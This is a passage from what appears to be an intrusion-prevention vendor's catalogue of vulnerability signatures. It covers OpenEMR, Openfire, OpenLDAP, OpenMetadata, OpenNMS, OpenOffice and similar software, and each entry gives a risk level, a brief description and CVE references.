Type:

Directory Traversal

Description:

Improper validation of the form_filename parameter in download_template.php causes a directory traversal vulnerability in OpenEMR. A successful exploit allows an attacker to gain read access to arbitrary files on the target system.

References:

CVE-2019-3967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3967

Openemr-Download_template.php-Directory-Traversal

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1259-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Directory Traversal

Description:

A directory traversal vulnerability exist in OpenEMR. The vulnerability is due to improper validation of the form_filename parameter in download_template.php. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the server. Successful exploitation could result in information disclosure condition.

Situation:

HTTP_CRL-Openemr-Download_template.php-Directory-Traversal

References:

CVE-2019-3967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3967

Openemr-Facility_admin.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1199-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in OpenEMR. Successful exploitation could lead in arbitrary script execution.

Situation:

HTTP_CSU-Openemr-Facility_admin.php-Cross-Site-Scripting

References:

CVE-2019-8368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8368

Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

Improper input validation for the fee_sheet_options_ajax.php endpoint causes a cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting

References:

CVE-2022-2733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2733

Openemr-Globals.php-Authentication-Bypass

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Malfunction

Description:

An authentication weakness vulnerability exists in OpenEMR, specifically the globals.php script. The vulnerability is due to variable name collision during HTTP parameter extraction. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted requests to the server. Successful exploitation will bypass authentication and allow the attacker to gain unauthorized access to the system.

Situation:

HTTP_CRL-Openemr-Globals.php-Authentication-Bypass

References:

CVE-2015-4453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4453

Openemr-Make_Task-SQL_Injection

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

High

First detected in:

sgpkg-ips-1193-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

SQL Injection

Description:

A vulnerability in OpenEMR Development Team OpenEMR, versions 5.0.1 Patch 6 and lower, which allows remote attackers to perform an SQL injection through the make_task function via /forms/eye_mag/taskman.php and extract the contents of the entire database.

Situation:

HTTP_CSU-Openemr-Make_Task-SQL_Injection

References:

CVE-2018-17179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17179

Openemr-New.php-Command-Injection

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1215-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

A command injection vulnerability exists in OpenEMR. The vulnerability is due to improper validation of the id parameter in new.php. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the server. Successful exploitation could result in arbitrary command execution on the target server.

Situation:

HTTP_CRL-Openemr-New.php-Command-Injection

References:

CVE-2019-3968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3968

Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR.

Risk:

High

First detected in:

sgpkg-ips-1455-5242

Last changed:

sgpkg-ips-1455-5242

Platform:

Windows

Software:

OpenEMR Development Team OpenEMR

Type:

Cross-site Scripting

Description:

A vulnerability in OpenEMR Development Team OpenEMR, versions prior to 6.0.0.2, which allows remote attacker to execute arbitrary code by sending crafted requests to the target server, due to insufficient sanitization of patients' first and last names in new_comprehensive_save.php.

Situation:

HTTP_CRL-Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting

References:

CVE-2022-1181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1181

Openemr-Patient_Report-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

Insufficient sanitization of the title field in patient_report.php causes a stored cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Openemr-Patient_Report-Stored-Cross-Site-Scripting

References:

CVE-2021-25921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25921

Openemr-Phpgacl-Edit_group.php-SQL-Injection

About this vulnerability:

A vulnerability in OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1346-5242

Last changed:

sgpkg-ips-1346-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in the OpenEMR phpGACL. Successful exploitation could lead in execution of arbitrary SQL statements.

Situation:

HTTP_CRL-Openemr-Phpgacl-Edit_group.php-SQL-Injection

References:

CVE-2020-13568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13568

Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

High

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for OpenEMR. This vulnerability is due to improper input validation for the fld_title parameter when creating rules. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting

References:

CVE-2022-1179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1179

Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenEMR Development Team OpenEMR

Risk:

Moderate

First detected in:

sgpkg-ips-1607-5242

Last changed:

sgpkg-ips-1607-5242

Platform:

Generic

Software:

OpenEMR Development Team OpenEMR

Type:

Input Validation

Description:

Improper input validation for the list_id parameter in share_template.php causes a cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting

References:

CVE-2023-2948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2948

Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting

About this vulnerability:	A vulnerability in OpenEMR Development Team OpenEMR
Risk:	Moderate
First detected in:	sgpkg-ips-1330-5242
Last changed:	sgpkg-ips-1330-5242
Platform:	Generic
Software:	OpenEMR Development Team OpenEMR
Type:	Input Validation
Description:	Insufficient sanitation for the user-supplied data in usergroup_admin.php causes a cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation:	HTTP_CRL-Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting

OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315

About this vulnerability:

An attempt to exploit a vulnerability in Ignite Realtime OpenFire detected

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

Ignite Realtime Openfire

Type:

Insecure Configuration

Description:

Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0).

Situation:

HTTP_CSU-OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315

References:

CVE-2023-32315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32315

OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in OpenJPEG

Risk:

Moderate

First detected in:

sgpkg-ips-816-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenJPEG; MuPDF

Type:

Malfunction

Description:

Lack of validation of JPEG2000 file structures causes an out-of-bounds write vulnerability. A successful exploitation can allow an attacker to run arbitrary code on the target system.

Situation:

File-JPEG_OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write

References:

CVE-2016-8332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8332

OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability

About this vulnerability:

A vulnerability in OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-1473-5242

Last changed:

sgpkg-ips-1473-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in the slapd of OpenLDAP. The vulnerability is due to improper input validation in LDAP search requests. A remote attacker can exploit the vulnerability by sending a crafted query to the target OpenLDAP server. Successful exploitation could result in the arbitrary SQL command execution under the security context of the LDAP database user.

Situation:

LDAP_CS-OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability

References:

CVE-2022-29155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29155

OpenLDAP-BER_get_next-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-690-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Input Validation

Description:

There exists a denial of service vulnerability in OpenLDAP.

Situation:

LDAP_CS-OpenLDAP-BER_get_next-Denial-Of-Service

References:

CVE-2015-6908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6908

OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS

About this vulnerability:

An OpenLDAP ldapsearch Pagesize Double Free DoS vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-937-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

A double free vulnerability in OpenLDAP, versions prior to 2.4.45, due to the improper handling of ldapsearch queries, which allows remote attackers to cause a denial of service condition by sending a crafted query with a pagsize of 0.

Situation:

LDAP_CS-OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS

References:

CVE-2017-9287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9287

OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

A vulnerability exists in OpenLDAP. The vulnerability is due to invalid memory access when handling a NULL string in a modrdn request. A remote attacker could exploit this vulnerability by sending a malicious request via a modrdn request to connect to the target server. Successful exploitation would allow cause termination of sldapd daemon resulting in a denial of service condition.

Situation:

LDAP_CS-OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service

References:

CVE-2010-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0212

BID-41770
http://www.securityfocus.com/bid/41770

OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

A code execution vulnerability exists in OpenLDAP. The vulnerability is due to a memory corruption when handling a UTF8 string via modrdn. A remote attacker could exploit this vulnerability by sending a malicious request via modrdn to connect to the target server. Successful exploitation would allow injection and execution of arbitrary code in the context of the affect service. Unsuccessful code injection attempts would cause termination of sldapd daemon resulting in a denial of service condition.

Situation:

LDAP_CS-OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution

References:

CVE-2010-0211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211

BID-41770
http://www.securityfocus.com/bid/41770

OpenLDAP-Modrdn-Request-Null-Pointer-Dereference

About this vulnerability:

OpenLDAP Modrdn Request Null Pointer Dereference Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

OpenLDAP

Type:

Input Validation

Description:

A vulnerability exists in OpenLDAP 2.4.22 which allows remote attackers to create a denial of service condition or execute arbitrary code by a modrdn call with a zero-length RDN destination string, due to the fact that the input is not properly validated resulting in a null pointer dereference.

Situation:

LDAP_CS-OpenLDAP-Modrdn-Request-Null-Pointer-Dereference

References:

CVE-2010-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0212

BID-41770
http://www.securityfocus.com/bid/41770

OpenLDAP-Nested-Filter-Stack-Overflow

About this vulnerability:

A vulnerability in OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-1255-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Buffer Overflow

Description:

There exists a vulnerability in the slapd of OpenLDAP, versions before 2.4.50, which allows remote attackers to cause a denial of service condition by sending a crafted query to the target, due to improper handling of deeply nested filter in the filter.c.

Situation:

LDAP_CS-Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service

References:

CVE-2020-12243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12243

OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

Moderate

First detected in:

sgpkg-ips-1334-5242

Last changed:

sgpkg-ips-1334-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Infinite Loop

Description:

Improper validation of incoming LDAP request contents causes a denial of service vulnerability in OpenLDAP. A successful exploit causes an infinite loop which leads to a denial of service condition.

Situation:

LDAP_CS-OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service

References:

CVE-2020-36227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36227

OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

A denial of service vulnerability exists in OpenLDAP. The vulnerability is due to NULL pointer dereference in the Deref overlay of slapd when certain LDAP request messages are processed. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the server. Successful exploitation could lead to the OpenLDAP server process terminating abnormally.

Situation:

LDAP_CS-OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference

References:

CVE-2015-1545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1545

BID-72519
http://www.securityfocus.com/bid/72519

OSVDB-118031
http://www.osvdb.org/118031

OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

Moderate

First detected in:

sgpkg-ips-1324-5242

Last changed:

sgpkg-ips-1324-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

Improper input validation on incoming LDAP requests causes an assertion failure vulnerability in OpenLDAP Slapd. A successful exploit allows a remote attacker to cause a denial of service condition on the affected service.

Situation:

LDAP_CS-OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure

References:

CVE-2020-36222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36222

OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

Moderate

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

Improper input validation on incoming LDAP requests causes an assertion failure vulnerability in OpenLDAP. A successful exploit can allow a remote attacker to cause a denial of service condition on the target service.

Situation:

LDAP_CS-OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure

References:

CVE-2020-36222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36222

OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in the slapd of OpenLDAP. The vulnerability is due to improper input validation in controls in LDAP search requests. A remote attacker can exploit the vulnerability by sending a crafted query to the target OpenLDAP server. Successful exploitation could cause an assertion failure which leads to a denial of service condition.

Situation:

LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure

References:

CVE-2021-27212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27212

OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow

About this vulnerability:

A vulnerability in OpenLDAP Foundation OpenLDAP

Risk:

High

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Integer Overflow

Description:

A denial-of-service vulnerabilities has been reported in slapd; a component of OpenLDAP. The vulnerability is due to improper input validation on controls in LDAP search requests. A remote attacker can exploit these vulnerabilities by sending a crafted query to the target OpenLDAP server. Successful exploitation could cause an integer underflow leading to denial of service conditions.

Situation:

LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow

References:

CVE-2020-36228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36228

OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow

About this vulnerability:

A vulnerability in OpenLDAP slapd

Risk:

High

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Input Validation

Description:

A vulnerability in the slapd of OpenLDAP, versions prior to 2.4.57, which allows remote attackers to cause a denial of service condition by sending a crafted query to the target OpenLDAP server, due to the improper validation in controls in LDAP search requests.

Situation:

LDAP_CS-OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow

References:

CVE-2020-36221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36221

OpenMediaVault-Cron-Remote-Command-Execution

About this vulnerability:

OpenMediaVault Cron Remote Command Execution

Risk:

Moderate

First detected in:

sgpkg-ips-571-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenMediaVault

Type:

Code Injection

Description:

There is a remote command execution vulnerability in OpenMediaVault software NAS solution. An authenticated user can create Cron-jobs for any system user, including root.

Situation:

HTTP_CRL-OpenMediaVault-Cron-Remote-Command-Execution

References:

CVE-2013-3632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3632

BID-62873
http://www.securityfocus.com/bid/62873

OSVDB-99143
http://www.osvdb.org/99143

Openmetadata-Authentication-Bypass-CVE-2024-28255

About this vulnerability:

A vulnerability in OpenMetadata

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

OpenMetadata

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with another vulnerability, such as CVE-2024-28847 SpEL injection, this issue can be leveraged for unauthenticated remote code execution.

Situation:

HTTP_CRL-Openmetadata-Authentication-Bypass-CVE-2024-28255
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255

References:

CVE-2024-28255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28255

Openmetadata-Spel-Injection-CVE-2024-28253

About this vulnerability:

A vulnerability in OpenMetadata

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

OpenMetadata

Type:

Input Validation

Description:

A SpEL injection vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with CVE-2024-28255 for authentication bypass, this issue can be leveraged for unauthenticated remote code execution.

Situation:

HTTP_CS-Openmetadata-Spel-Injection-CVE-2024-28253
HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255

References:

CVE-2024-28253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28253

Openmetadata-Spel-Injection-CVE-2024-28254

About this vulnerability:

A vulnerability in OpenMetadata

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

OpenMetadata

Type:

Input Validation

Description:

Situation:

HTTP_CSU-Openmetadata-Spel-Injection-CVE-2024-28254
HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255

References:

CVE-2024-28254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28254

Openmetadata-Spel-Injection-CVE-2024-28847

About this vulnerability:

A vulnerability in OpenMetadata

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

OpenMetadata

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255

References:

CVE-2024-28847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28847

Openmetadata-Spel-Injection-CVE-2024-28848

About this vulnerability:

A vulnerability in OpenMetadata

Risk:

High

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

OpenMetadata

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255

References:

CVE-2024-28848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28848

Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in OpenMRS Reference Application

Risk:

Moderate

First detected in:

sgpkg-ips-1254-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenMRS

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in OpenMRS Reference Application. Successful exploitation could lead in abitrary script exeuction in the target user's web browser.

Situation:

HTTP_CRL-Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting

References:

CVE-2020-5730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5730

Openmrs-Webservices.rest-Insecure-Object-Deserialization

About this vulnerability:

A vulnerability in OpenMRS

Risk:

Moderate

First detected in:

sgpkg-ips-1144-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenMRS

Type:

Input Validation

Description:

Lack of input validation within the webservices.rest module in OpenMRS causes a deserialization vulnerability, which can lead to an attacker gaining the ability to execute arbitrary code on the target with the privileges of the service.

Situation:

HTTP_CS-Openmrs-Webservices.rest-Insecure-Object-Deserialization

References:

CVE-2018-19276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19276

OpenNetAdmin-Ping-Command-Injection

About this vulnerability:	A vulnerability in OpenNetAdmin
Risk:	High
First detected in:	sgpkg-ips-1226-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	OpenNetAdmin
Type:	Input Validation
Description:	There exists a vulnerability in OpenNetAdmin, versions 8.5.14 to 18.1.1, which allows remote attackers to execute arbitrary code due to insufficient input validation of /ona/login.php.
Situation:	HTTP_CRL-OpenNetAdmin-Ping-Command-Injection

OpenNMS-Privilege-Escalation-CVE-2023-0872

About this vulnerability:

A vulnerability in OpenNMS

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Unix; Linux

Software:

OpenNMS

Type:

Input Validation

Description:

The Horizon REST API includes a users endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer.

Situation:

File-Text_OpenNMS-Authenticated-Remote-Code-Execution
File-TextId_OpenNMS-Authenticated-Remote-Code-Execution

References:

CVE-2023-0872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0872

OpenNMS-Privilege-Escalation-CVE-2023-40315

About this vulnerability:

A vulnerability in OpenNMS

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Unix; Linux

Software:

OpenNMS

Type:

Input Validation

Description:

In OpenMNS 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FILESYSTEM_EDITOR can easily escalate their privileges to ROLE_ADMIN or any other role. The solution is to upgrade to Meridian 2023.1.5 or Horizon 32.0.2 or newer.

Situation:

File-Text_OpenNMS-Authenticated-Remote-Code-Execution
File-TextId_OpenNMS-Authenticated-Remote-Code-Execution

References:

CVE-2023-40315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40315

OpenNMS-Rmi-Java-Object-Deserialization

About this vulnerability:	A vulnerability in OpenNMS
Risk:	Moderate
First detected in:	sgpkg-ips-829-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	OpenNMS
Type:	Input Validation
Description:	A vulnerability in OpenNMS
Situation:	Generic_CS-OpenNMS-Rmi-Java-Object-Deserialization

OpenNMS-XML-External-Entity-Injection

About this vulnerability:

OpenNMS XML External Entity Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenNMS

Type:

Code Injection

Description:

An XML external entity injection vulnerability exists in OpenNMS, due to the lack of command validation, which allows remote attackers to gain root access through the user rtc, giving the attackers unrestricted access.

Situation:

HTTP_CRL-OpenNMS-XML-External-Entity-Injection

References:

CVE-2015-0975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0975

OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in OpenOffice.org

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in the OpenOffice software suite.

Situation:

HTTP_SS-OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
File-Binary_OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow

References:

CVE-2008-2238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238

BID-31962
http://www.securityfocus.com/bid/31962

OpenOffice-EMF-File-EMR_BITBLT-Record-Integer-Overflow

About this vulnerability:

Integer overflow vulnerability in OpenOffice software suite

Risk:

Moderate

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Buffer Overflow

Description:

There is an integer overflow vulnerability in OpenOffice software suite. A remote attacker can exploit this vulnerability by persuading a user to open a malicious EMF file with a vulnerable version of the affected product. Successful exploitation allows code execution with the privileges of the currently logged in user.

Situation:

E-Mail_BS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
HTTP_SS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
File-Binary_OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow

References:

CVE-2007-5746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5746

BID-28819
http://www.securityfocus.com/bid/28819

OSVDB-44470
http://www.osvdb.org/44470

OpenOffice-OLE-File-Stream-Buffer-Overflow

About this vulnerability:

A vulnerability in OpenOffice

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenOffice.org

Type:

Integer Overflow

Description:

A heap overflow vulnerability exists in the OpenOffice software suite. The vulnerability is due to the way OpenOffice imports OLE files. A remote attacker could exploit this vulnerability by persuading a user to open an OLE file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

